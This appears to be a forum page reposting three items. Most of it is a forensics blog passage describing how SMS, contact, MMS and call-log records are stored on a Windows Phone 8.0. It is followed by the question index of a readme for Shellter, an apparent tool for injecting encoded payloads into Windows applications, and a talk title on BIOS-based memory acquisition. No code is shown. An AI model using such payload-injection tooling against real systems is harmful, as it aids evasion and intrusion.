sent/received. Using Cellebrite Physical Analyzer to view the "store.vol" hex, Eagle-eyed Cindy noticed that there were 8 byte groupings occurring before/after the SMS text content. These 8 bytes were usually around the same value range (eg in LE xFF03D2315FE1C701). Which is what you'd expect within a single message. Subsequent messages usually had larger values - which corresponds to messages sent/received at a later time. Like most hex viewers, Cellebrite Physical Analyzer can interpret a predefined number of bytes from the current cursor position and print a human friendly version. Using this, Calculon Cindy showed an otherwise oblivious monkey that these 8 byte groupings could be interpreted as MS FILETIME timestamps! To be honest, I was expecting smaller 4 byte timestamps - Silly monkey! By comparing the 8 byte values surrounding a specific SMS text message (eg "Look! A Squirrel!") with the date displayed on the phone for that message, we theorized that our mysterious timestamps were *probably* MS FILETIME timestamps (No. of 100 ns increments since 1 January 1601 in UTC). For example, xFF03D2315FE1C701 = Sat, 18 August 2007 06:15:37 UTC. As the phone did not display the exact time for each SMS, we could only use the order of threaded messages and the date displayed to somewhat confirm our theory. Various SMS sent/received dates on the phone were spot checked against a corresponding "store.vol" entry timestamp date and the date values consistently matched. [h=3]What the data looks like[/h] After some hex ray vision induced cross-eyedness (who knew that looking at hex is almost like a curse!), we think we've figured out some general data structures for SMS, MMS, Contacts and Call log records. There's still some unknowns/grey areas but it's a start. - On the data structure diagrams below, "?" is used to denote varying/unknown number of bytes. - FILETIMEs are LE 8 byte integers representing the number of 100 ns intervals since 1 JAN 1601. - In general, strings are null terminated and UTF-16-LE encoded (ie 2 bytes per character). [h=4]Sent / Received SMS records[/h] There are two types of SMS data structures which are mixed together. Each type of SMS structure contains a UTF-16-LE encoded string for "SMStext". However, one type contains phone number strings and the other does not. For later ease of understanding, we'll say these "SMStext" records occur in "Area 1". Initially, monkey was confused about why some SMS records had phone numbers and some didn't. However, by inspecting the unlocked phone, we were able to confirm that the SMS message records with no number corresponded to sent SMS. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Sent "SMStext" record (from Area 1 in "store.vol") [/TD] [/TR] [/TABLE] Note 1: Note the lack of Phone number information. From test data, FILETIME values (in red and pink) seemed a little inconsistent. Sometimes FILETIMEs within the same record matched each other and other times they varied by seconds/minutes. Note 2: The Sent Text string (in yellow) is null terminated and encoded in UTF-16-LE. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Received "SMStext" record (from Area 1 in "store.vol")[/TD] [/TR] [/TABLE] Note 1: Received SMS have multiple source phone number strings listed (in orange). These seem to remain constant within a given record (eg PHONE1 = PHONE2 = PHONE3) Note 2: Similar to Sent "SMStext" records, the FILETIMEs (in red and pink) within a record might/might not vary. Note 3: The Received Text string (in yellow) is null terminated and encoded in UTF-16-LE. To find out the destination phone number for a sent SMS we can make use of the factoid observed by searching "store.vol" for the FILETIMEs from a specific Sent "SMStext" record. It appears that FILETIMEs 1, 3 & 4 (in pink) from a given Sent "SMStext" record usually occur once in the entire "store.vol". The FILETIME2 value (in red) however, also appears in a second area ("Area 2"). This area has a bunch of different looking data records each containing the null terminated UTF-16-LE encoded string for "SMS". Also contained in each data record is a phone number string. The "Area 2" SMS records look like: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"SMS" record (from Area 2 in "store.vol")[/TD] [/TR] [/TABLE] Note 1: Each "SMS" record contains a UTF-16-LE encoded string for "SMS". Note 2: From both sets of test data, there seems to be a consistent number of bytes between: - The FILETIMEX (in red) and "SMS" string (in kermit green) and - The "SMS" string (in kermit green) and the Phone number string (in orange). So, each sent "SMStext" FILETIME2 value (from Area 1) should have a corresponding match with an "SMS" record's FILETIMEX value (in Area 2). In this way, we can match a sent "SMStext" message with the destination phone number via the FILETIME2 value. Sounds a little crazy right? But the test data seems to confirm this. Purrr! [h=4]Contacts[/h] Contact information is also located in "store.vol". There were 2 observed data structure types - both contained phone number and name information however, one data type had an extra 10 digit number string. It was later discovered via phone inspection that the records with the extra 10 digit strings corresponded with "Hotmail" address book entries. It would be interesting to see if the 10 digit number corresponded to a unique hotmail user ID of some kind. The second type of contacts structure was a "Phonebook" entry - presumably these contact types were entered into the phone by the user rather than slurped up from a Hotmail account. Common to both contact records were multiple occurrences of the same contact name and phone number. OCD phonebook, OCD phonebook, OCD phone book ... [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"Hotmail" Contacts record (from "store.vol")[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"Phonebook" Contacts record (from "store.vol")[/TD] [/TR] [/TABLE] Note 1: The flag value (in red) which can be used to determine if the contact record is a "Hotmail" or "Phonebook" entry. Note 2: The potential 6 byte magic number (0xFFFFFF2A2A00) for Contact records should make it easier to find each entry. This was discovered by Sharp-eyed Cindy on the last day (by which time monkey had lost the will to live). Note 3: The 10 digit string (in pink) could be a potential Hotmail ID. [h=4]MMS data[/h] Further research is required for MMS records (eg linking timestamps and phone numbers to sent files). But here's what we've learned so far ... Various .dat files containing MMS content (eg there was a .dat file containing a sent JPEG and another .dat file containing the accompanying text) are stored in: \SharedData\Comms\Unistore\data under 3 sub-directories: "0", "2" and "7". These folders might correspond to Sent, Received and Draft??? There were multiple .dat files with similar names each seemingly containing info for different parts of the same MMS. In "store.vol", there are records containing the UTF-16-LE encoded string for "MMS". These records also contain 3 filename strings and a filetype string (possibly the MIME type eg "image/jpeg"). From my jet-lagged memory, I want to say that the filename strings were pointing to the same filename and there were multiple "MMS" entries for a single MMS message (ie each MMS message has three separate files associated with it). But you should probably should check it out for yourself ... [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]MMS record (from "store.vol")[/TD] [/TR] [/TABLE] [h=4]Call log[/h] The Call log information is located in the "Phone" file. Each Call log record contains a flag (in blue) to mark whether a call record is Missed / Incoming / Outgoing. The flag values were confirmed via inspection of the phone and corresponding Call log record. There's also Start and Stop FILETIMEs, repeated contact names and repeated phone numbers. Of potential interest is a 10 digit ASCII encoded string (in grey) and what looks to be a GUID (in light purple). Each call record had the same GUID string value enclosed by "{}". Perhaps this GUID represents the phone device or the calling application??? I wonder if it would be consistent between different model phones... [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Call log record (from "Phone")[/TD] [/TR] [/TABLE] [h=3]Summary[/h] So there you have it - we started off knowing very little about Windows Phone 8.0 data storage and now we know a considerable amount more especially regarding SMS records. Due to time constraints, it was not possible to investigate the non-SMS related data areas (ie MMS, Call log, Contacts) with the same level of detail. However, it's probably better to share what we've discovered now as I don't know when I'll be able to perform further research. The observations in this post may not be consistent for Windows 8.1 and/or on other models of Windows phones but hopefully this post can still serve as a starting point. As always, check that the underlying data matches your expectations! It was really awesome having someone else to bounce ideas off when hex-diving. I'm pretty sure I would have missed some important details (eg the FILETIME timestamp) had it not been for another set of eyes. Of course, that's not always going to be possible so I also appreciated the other opportunities to work automonously / with minimal supervision. Someday monkey might have to do this on his lonesome! Initially, it was easy to tie my idea of success with the "I have to code a solution for every scenario/data set". It would have been awesome if I could have done that but the fact was - we didn't have any SMS messages from "store.vol" at the start and after running the one-off SMS script, we had 5000+ messages sorted in chronological order with their associated phone numbers. Success doesn't have to be black and white. It sounds cliche but focusing on little wins each day made it easier to start eating the metaphorical elephant. Now please excuse me, while I adjust my pants ... Posted by Cheeky4n6Monkey at 14:35 Sursa: Cheeky4n6Monkey - Learning About Digital Forensics: Monkeying around with Windows Phone 8.0

Shellter v1.0 Index ======= [1] What is it? [2] How does it work? [3] What does it trace? [4] Why do I need Shellter? [5] What types of apps can I use? [6] Can I use encoded/self-decrypting payloads? [7] What about self-modifying code? [8] What about relocations? [9] What about Multi-Thread Applications? [10] what about Anti-Reversing tricks? [11] What if the target process dies during tracing? [12] What if an internal engine related error occurs? [13] How do execution flow filters work? [14] How much time does it need for tracing and log filtering? [15] What options does Shellter provide? [16] System Requirements [17] What should I do if I want to send feedback? [18] What should I do if I want to report a bug? [19] What should I do if I don't like it? Readme: https://www.shellterproject.com/Downloads/Shellter/Readme.txt Sursa: https://www.shellterproject.com/download/

[h=1]OHM2013: RAM Memory acquisition using live-BIOS modification[/h]